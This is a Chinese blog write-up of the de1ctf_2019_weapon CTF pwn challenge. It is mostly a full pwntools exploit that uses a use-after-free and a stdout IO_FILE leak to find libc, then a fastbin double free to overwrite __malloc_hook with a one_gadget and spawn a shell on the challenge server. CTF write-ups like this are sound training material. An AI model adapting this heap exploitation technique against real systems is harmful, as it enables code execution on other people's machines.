de1ctf_2019_weapon

最新推荐文章于 2023-07-10 20:42:26 发布
最新推荐文章于 2023-07-10 20:42:26 发布
阅读量729 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/105949330
版权

这题我多了一个换行搞了老久了服了还是tcl

思路

有uaf通过写IO来得到libc地址然后通过double free来拿到shell
exp:

#!/usr/bin/python2
from pwn import *
p=0
def pwn():
	global p
	#p=process('./de1ctf_2019_weapon')
	p=remote('node3.buuoj.cn',29212)
	elf=ELF('./de1ctf_2019_weapon')
	libc=elf.libc

	def add(size,idx,name):
		p.sendlineafter('>>','1')
		p.sendlineafter(': ',str(size))
		p.sendlineafter(': ',str(idx))
		p.sendafter(':',name)

	def delete(idx):
		p.sendlineafter('>>','2')
		p.sendlineafter(':',str(idx))

	def edit(idx,data):
		p.sendlineafter('>>','3')
		p.sendlineafter(': ',str(idx))
		p.sendafter(':',data)


	payload=p64(0)*1+p64(0x71)
	add(0x28,0,payload)
	add(0x18,1,'cccc')
	add(0x38,2,'dddd')
	add(0x60,3,'\x02'*2)
	add(0x60,4,'aaaa')
	add(0x60,5,'bbbb')
	delete(3)
	delete(4)
	edit(4,'\x10')
	add(0x60,8,'dd')
	add(0x60,7,p64(0)*3+p64(0x21)+p64(0)*3+p64(0xb1))
	delete(2)
	delete(3)
	add(0x38,2,'aaa')
	edit(3,'\xdd\x85')
	payload='\x00'*(0x40+3-0x10)+p64(0x1800)+'\x00'*0x19
	payload1='\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0)
	add(0x60,8,'aaa')
	add(0x60,9,payload1)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c5600
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
	one_gadget=libcbase+o_g[3]
	delete(3)
	delete(4)
	delete(3)
	add(0x60,3,p64(malloc_hook-0x23))
	add(0x60,6,'doudou')
	add(0x60,4,'doudou1')
	add(0x60,8,'a'*0x13+p64(one_gadget))
	log.success('libcbase: '+hex(libcbase))
	p.sendlineafter('>>','1')
	p.sendlineafter(': ',str(0x20))
	p.sendlineafter(': ',str(8))
	p.interactive()
	return True

if __name__=="__main__":
	while 1:
		try:
			if pwn()==True:
				break
		except Exception as e:
			p.close()
			continue
doudoudedi
关注
专栏目录
de1ctf_2019_weapon (IO_FILE)
BengDouLove的博客
05-27 1067
这道题的方法对于我来说有点陌生,堆操作之后利用IO_FILE的相关知识,记录一下,以后还会有更多对于 IO 的利用 保护机制全开,所以常规方法肯定没办法 分析程序: 这是主程序 menu函数 create函数 逻辑是输入申请大小,在输入index,然后就写入chunk 没有任何检查,比如申请过的index不能用之类的 最简洁的申请函数 delete函数 同样是简洁的释放函数,而且有 uaf 漏洞 rename函数 改写chunk内容,写入的时候貌似没有溢出,但是 uaf 能用在这上面 程序看似
De1CTF_2020_wp_re_parser
0xDQ的博客
05-06 864
0x00 前言 先膜一下小组里的大师傅们,tql。 出题的师傅感觉也好nb。 先写re的其中的 parser . 0x01parser 这是一个用c++写的解释器,在动调的时候,很难看,后来看NuLL的wp说“⽤了⼀种新的动态绑定⽅式”。回头看看 先放到ida里看一眼,找到输入输入位置: 输入后加上“\n”,进行tokenize,进入sub_35F0: 很简单可以看...
[uaf + double free] de1ctf_2019_weapon
huzai9527的博客
09-22 354
[uaf + double free] de1ctf_2019_weapon 1. ida分析 删除的时候,只是检查了index范围,没有检查是否存在,存在double free 并且free后,指针没有置空,存在uaf 限制了chunk大小,需要通过uaf 构造fake chunk,修改chunk head的大小,构造unstored bin attack 2. 思路 1⃣️申请3个chunk 0,chunk 1,chunk 2,用chunk 0伪造chunk 1 的head,free chunk
de1ctf_2019_weapon(IO_leak,doublefree)
m0_51251108的博客
11-17 467
de1ctf_2019_weapon: 保护全开
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
最新发布
m0_73756460的博客
07-10 297
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
DE1_i2sound.rar_ALTERA DE1_DE1 音乐_de1_de1_i2sound
09-23
DE1_i2sound.rar 是一个针对Altera DE1开发板的资源包,主要目标是实现通过DE1平台播放音乐的功能。这个压缩包包含了与DE1开发板上的I2S(Inter-IC Sound)接口相关的软件、硬件设计以及可能的教程资料,帮助用户...
My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps
09-21
标题 "My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps" 暗示了这是一个关于DE1-SOC开发板上实现的"My First HPS"项目,其中HPS代表Hard Processor System(硬处理器系统)。这个项目可能是针对初学者...
[De1CTF 2019]ShellShellShell复现
lllffg的博客
02-18 499
[De1CTF 2019]ShellShellShell 这里是一个md5截断,直接拿脚本跑一下即可 # -*- coding: utf-8 -*- #在python2环境下执行python2 1.py '94d20' 0即可执行 import multiprocessing import hashlib import random import string import sys CHARS = string.letters + string.digits def cmp_md5(substr,
DelCTF2019 weapon WP
qq_41252520的博客
10-06 388
保护 分析 程序一共只有三个操作:增、删、改。又是没有泄露,看来又是利用IO_FILE泄露内存了。 漏洞还是很明显的,在删除操作中没有将free掉的指针置NULL 并且编辑的时候没有检测指针的合法性,因此形成了UAF。 在添加操作中限制了分配的大小 利用 程序中多处存在scanf函数,根据前面的文章可以知道,scanf可以帮我们得到一块unsortbin的chunk,我们构造的攻击链如...
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 421
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
De1CTF weapon 经验总结
qq_43189757的博客
10-04 798
第一次接触通过利用_IO_2_1_stdout_ 来泄露libc地址的题目,中间碰到不少问题,在这里记录一下 1.泄露libc 由于程序限制了创建的堆块大小为0x60 以内,所以无法同通过创建一个大小能放入unsortedbin中的堆块,但是可以通过伪造一个大小符合unsortedbin中的堆块来泄露libc地址 具体步骤: 1.创建五个大小为0x20堆块 编号依次为0-5, 之后一次释放chun...
De1CTF-2019部分wp
CTF小白的博客
08-05 2280
目录Misc1——We1comeMisc2——Mine SweepingWeb1——SSRF MeCrypto1——xorz 去De1CTF划了划水,发现自己是真的菜━┳━ ━┳━ Misc1——We1come https://t.me/De1CTF ,需要加Telegram群,需要VPN,群里有发签到的flag Misc2——Mine Sweeping 下载下来是一个扫雷游戏 在没有雷的地...
De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1166
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
BUUCTF [De1CTF2019]cplusplus
weixin_53349587的博客
01-04 661
拿到文件,IDA打开,进入主函数main(): 通过分析,函数第60行为标志性的获取输入函数。 然后在第104行出现了关键函数判断: 其中v47是我们输入的字符串,所以第108行和109行也是关键函数,对我们的输入进行了加密。 先进入104行sub_140005910函数: 函数中有三个sub_140005A90函数,通过动态调试发现,就是将我们输入的字符串每一个都转化为十六进制数。 进入sub_140005A90函数: 因为在关键判断的函数中一共有三个将输入的字符转为16进制的函数...
BUUCTF:[De1CTF 2019]SSRF Me
末初的CSDN博客
04-24 1079
https://buuoj.cn/challenges#[De1CTF%202019]SSRF%20Me 源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencodi
Weapon
weixin_30612769的博客
09-05 203
Weapon Time Limit: 1000 msMemory Limit: 32768 KB In World War 3, your countries' scientists have invented a special weapon. Assume that the enemy's city can be described by rectangular coordi...
[De1CTF 2019]9calc 这道题暂时还没搞明白,暂时做个记录~~
a3320315的博客
02-10 1103
参考链接 飘零师傅 梅子酒师傅 cacl_famliy
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 822
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
DE1_SoC FPGA设计入门教程
"SoC-FPGA Design Guide(DE1_SoC).pdf" 是一份英文的SoCFPGA基础开发教程,特别适合初级开发者学习。文档详细介绍了SoCFPGA的设计和DE1_SoC开发板的使用。 在SoCFPGA(System on Chip - Field Programmable Gate ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值